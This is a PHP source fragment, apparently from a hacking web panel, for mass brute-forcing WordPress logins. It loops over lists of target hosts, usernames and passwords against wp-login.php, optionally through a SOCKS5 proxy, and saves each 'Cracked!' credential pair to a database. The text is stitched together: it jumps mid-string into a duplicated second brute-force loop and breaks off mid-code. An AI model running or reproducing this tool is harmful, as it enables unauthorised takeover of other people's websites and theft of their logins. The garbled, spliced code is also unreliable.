function wp_brute()
{
if (isset($_POST['hosts']) && isset($_POST['passwords']) && isset($_POST['usernames'])) {
$conn = new mysqli(SQL_HOST, SQL_USER, SQL_PWD, SQL_DB);
$hosts = trim(filter($_POST['hosts']));
$passwords = trim(filter($_POST['passwords']));
$usernames = trim(filter($_POST['usernames']));
if ($passwords && $usernames && $hosts) {
$hostsx = explode("\n", $hosts);
$usersx = explode("\n", $usernames);
$passsx = explode("\n", $passwords);
echo '<div class="post">';
echo '<h2 class="title"><a href="#">Results</a></h2>';
echo '<div class="entry">';
echo '<p class="meta"> Wordpress CMS Bruteforce • Broken credentials will be stored in database';
foreach ($hostsx as $host) {
$host = RemoveLastSlash($host);
$hxd = 0;
$host = str_replace(array("http://", "https://", "www."), "", trim($host));
$host = "http://" . $host;
$wpAdmin = $host . '/wp-admin/';
if (!url_exists($host . "/wp-login.php")) {
echo "<p>" . $host . " - <font color='#990000'>Login page not found</font></p>";
ob_flush();
flush();
continue;
}
foreach ($usersx as $username) {
foreach ($passsx as $password) {
$ch = curl_init();
if (USE_PROXY == 1) {
curl_setopt($ch, CURLOPT_PROXYTYPE, CURLPROXY_SOCKS5);
curl_setopt($ch, CURLOPT_PROXY, PROXY_IP . ':' . PROXY_PORT);
}
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $host . '/wp-login.php');
curl_setopt($ch, CURLOPT_COOKIEJAR, "coki.txt");
curl_setopt($ch, CURLOPT_COOKIEFILE, "coki.txt");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_POST, TRUE);
curl_setopt($ch, CURLOPT_POSTFIELDS, "log=" . $username . "&pwd=" . $password . "&wp-submit=Giri‏" . "&redirect_to=" . $wpAdmin . "&testcookie=1");
$login = curl_exec($ch);
if (eregi("profile.php", $login)) {
$hxd = 1;
echo "<p>" . $host . " - Cracked! Username - <font color='#990000'>" . $username . "</font> & Password : <font color='#990000'>" . $password . "</font></p>";
mysqli_query($conn, "INSERT INTO brute(service, credentials) VALUES ('" . mysql_escape_string($host) . ":80', '" . mysql_escape_string($username) . ":" . mysql_escape_string($password) . "')", $conn);
ob_flush();
flush();
break;
}
}
if ($hxd == 1) {
break;
}
}
if ($hxd == 0) {
echo "<p>" . $host . " - <font color='#990000'>Failed</font></p>";
ob_flush();
flush();
}
}
echo '</div></div>';
} else {
echo "<h2><font color='#990000'>All fields are required!</font></h3>";
}
}
mysqli_close($conn);
}
/**
* Проверяет возможность создания папки или файла.
* Если предполагается что файл или папка будет создаваться в папке в которую нет прав на запись, возвращается false.
*
* @param $FileName
* @return bool
*/
function IsPossiblyCreated($FileName)
{
$FileName = RemoveLastSlash($FileName);
$path = GetPathName($FileName, false);
if (is_dir($path)) {
return is_writable($path);
}
$len = substr_count($path, '/');
for ($i = 0; $i < $len; $i++) {
$pos = strrpos($path, '/');
$path = substr($path, 0, $pos);
if (is_dir($path)) {
return is_writable($path);
}
}
return is_writable('.');
}
888888
999999';
}
echo '</textarea></td>
</tr>
<tr><td colspan="4"><center><br><input class="inputzbut" type="submit" name="submit" value="Brute Now" /></center>';
if ($_POST) {
$hosts = trim(filter($_POST['hosts']));
$passwords = trim(filter($_POST['passwords']));
$usernames = trim(filter($_POST['usernames']));
if ($passwords && $usernames && $hosts) {
$hosts_explode = explode("\n", $hosts);
$usernames_explode = explode("\n", $usernames);
$passwords_explode = explode("\n", $passwords);
foreach ($hosts_explode as $host) {
$host = RemoveLastSlash($host);
$hacked = 0;
$host = str_replace(array("http://", "https://", "www."), "", trim($host));
$host = "http://" . $host;
$wpAdmin = $host . '/wp-admin/';
if (!url_exists($host . "/wp-login.php")) {
echo "<p>" . $host . " => <font color='red'>Error In Login Page !</font></p>";
ob_flush();
flush();
continue;
}
foreach ($usernames_explode as $username) {
foreach ($passwords_explode as $password) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, $host . '/wp-login.php');
